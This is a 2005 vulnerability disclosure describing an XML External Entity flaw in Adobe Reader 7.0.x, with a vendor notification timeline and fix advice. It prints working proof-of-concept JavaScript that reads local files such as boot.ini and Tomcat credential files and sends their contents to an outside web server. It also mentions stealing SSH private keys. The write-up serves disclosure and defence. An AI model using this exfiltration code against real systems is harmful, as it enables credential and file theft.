Adobe Reader XML External Entity Attack

  Sverre H. Huseby
  2005-04-15

Note: This is the text I sent to Adobe to describe the issue. The problem has been fixed in Adobe Reader version 7.0.2.

It appears that the XML parser in Adobe Reader can be tricked into reading certain types of local files, and pass them off to other sites. At least it worked with my Adobe Reader 7.0.1 running on Windows XP SP2, and my Adobe Reader 7.0 running on Debian GNU/Linux. A friend of mine confirms that it also works on Mac OSX running Adobe Reader 7.0.

Recent versions of Adobe Reader allow inclusion of JavaScript. From those JavaScripts, one may work with XML documents. XML documents may reference External Entities through URIs, and most XML parsers, including the one used in Adobe Reader, will allow access to any URI for External Entities, including files, unless told to do otherwise. To my knowledge, the general "XML External Entity Attack" was first described by Gregory Steuck in a post to Bugtraq in 2002.

The following example XML document will make an XML parser read c:\boot.ini and expand it into the content of the foo tag:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "c:/boot.ini">
]>
<foo>&xxe;</foo>

Note how the ENTITY definition creates the xxe entity, and how this entity is referenced in the final line. The textual content of the foo tag will be the content of c:\boot.ini, and a JavaScript accessing the DOM will be able to extract it.

Note: The attack is limited to files containing text that the XML parser will allow at the place the External Entity is referenced. Files containing non-printable characters, and files with randomly located less than signs or ampersands, will not be includable. This restriction greatly limits the number of possible target files.

The following Adobe Reader-targeted JavaScript contains the above XML, instructs the Adobe Reader XML parser to parse it, and passes the expanded External Entity (i.e. the content of c:\boot.ini) to a remote web server using the system web browser:

var xml="<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY> "
       + "<!ENTITY xxe SYSTEM \"c:/boot.ini\"> ]><foo>&xxe;</foo>";
var xdoc = XMLData.parse(xml, false);
app.launchURL("http://shh.thathost.com/secdemo/show.php?"
              + "head=Your+boot.ini&text="
              + escape(xdoc.foo.value));

The remote web server URL points to a script that just displays whatever is sent to it. (Please realize that even if the content of c:\boot.ini is displayed in the local web browser, it has taken a trip to the remote web server before being displayed locally.) With my setup, the web page included the following:

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect /NoExecute=OptIn

One can clearly see that the web server got a copy of c:\boot.ini from the local computer. If you want to test, download the PDF file containing the script (created using Scribus), and move the mouse into the empty text field. The script is triggered when the mouse pointer enters the field. A similar PDF fetching the file /etc/passwd is also available, for testing on Unix-like systems.

As stated above, the XML parser is rather picky when it comes to the contents of the included file. But it has no problems if the file contains XML, which an increasing number of files appear to do these days.

New example: Apache Tomcat stores user names and (clear-text, shame on them!) passwords in a file called tomcat-users.xml. The following PDF-included JavaScript looks for this file in several plausible locations, and if found, extracts all interesting attributes from the included XML, and passes them on to the above mentioned web site:

function load(uri) {
    try {
        var xml="<?xml version=\"1.0\"?><!DOCTYPE foo [ <!ELEMENT foo ANY> "
           + "<!ENTITY xxe SYSTEM "
           + "\"" + uri + "\"> ]><foo>&xxe;</foo>";
        return XMLData.parse(xml, false);
    } catch (e) {
        console.println(e);
        return null;
    }
}

function attempt(uri) {
    var xdoc = load(uri);
    if (xdoc == null)
        return false;
    try {
        var users = XMLData.applyXPath(xdoc,
                                       "//foo/tomcat-users/user/attribute::*");
        var s = "match: " + uri + "\n"
        for (var q = 0; q < users.length; q++)
            s += users.item(q).name + "=" + users.item(q).value + "     ";
        app.launchURL("http://shh.thathost.com/secdemo/show.php?"
                      + "head=tomcat-users&text=" + escape(s));
        return true;
    } catch (e) {
        console.println(e);
    }
    return false;
}

uris = [
    "file:///C:/PROGRA~1/APACHE~1/TOMCAT~1.5/conf/tomcat-users.xml",
    "file:///C:/PROGRA~1/APACHE~1/TOMCAT~1.4/conf/tomcat-users.xml",
    "file:///C:/PROGRA~1/APACHE~2/TOMCAT~1.5/conf/tomcat-users.xml",
    "file:///C:/PROGRA~1/APACHE~2/TOMCAT~1.4/conf/tomcat-users.xml"
];

for (var q = 0; q < uris.length; q++)
    if (attempt(uris[q]))
        break;

When executed on my Windows XP, which happens to have Tomcat 5.5 installed in the default location, the web server script displays the following:

match: file:///C:/PROGRA~1/APACHE~2/TOMCAT~1.5/conf/tomcat-users.xml
name=admin password=foobar roles=admin,manager name=tomcat password=tomcat roles=tomcat name=role1 password=tomcat roles=role1 name=both password=tomcat roles=tomcat,role1

So, the administrator password is "foobar". A PDF file containing the script is also available.

I've also used the attack to get access to the private keys of OpenSSH, and the list of scrambled passwords from CVS. The latter is not always successful, as CVS may use less than or greater than signs during password scrambling. Both OpenSSH and CVS store their secret files in predictable locations.

Solution

Adobe should make sure the XML parser will not follow URIs to External Entities, or make it only follow known good URIs (white listed URIs). I do not know the XML parser used in Adobe Reader, but with other parsers one may install a custom made entity resolver and have it control the inclusion of the URI. With some parsers one can instead just say setExpandEntityReferences(false), but note that this doesn't do what you expect for some of the XML parsers out there. Testing will be needed.

I could also suggest that Adobe make it easier to fully disable the use of JavaScript in Adobe Reader. If JavaScript has been disabled, the Reader will currently ask if it should be re-enabled each time the program is exited.

Notification Tracking

2005-04-15: Adobe notified. (At least I think so. The "Thank you"-page that should have been produced by the vulnerability reporting form was not available ("page not found"), but it appears that the form was posted.)

2005-04-18: Three days with no reply, and no visits from Adobe in my web server log. I tried reporting the "page not found" using a generic feedback form, but was greeted with another "page not found". I then sent an E-mail to otinfo_AT_adobe.com, the only E-mail address I found on Adobe's web pages.

2005-04-19: Reply from otinfo_AT_adobe.com that I should try [CENSORED1]_AT_adobe.com. So I sent an E-mail to them as well. Still no trace in my web server logs that anyone but a few, trusted testing friends have seen this page. Later the same day, I contacted CERT in the hope that they would be able to get in touch with Adobe.

2005-04-20: Reply from Adobe's Product Security Incident Response Team (PSIRT) that they are looking into it.

2005-05-09: I sent an E-mail to Adobe's PSIRT asking for the current status.

2005-05-10: E-mail from Adobe that they're working on a fix.

2005-06-15: Adobe releases the fixed version 7.0.2 for Windows, and publishes an advisory on the issue.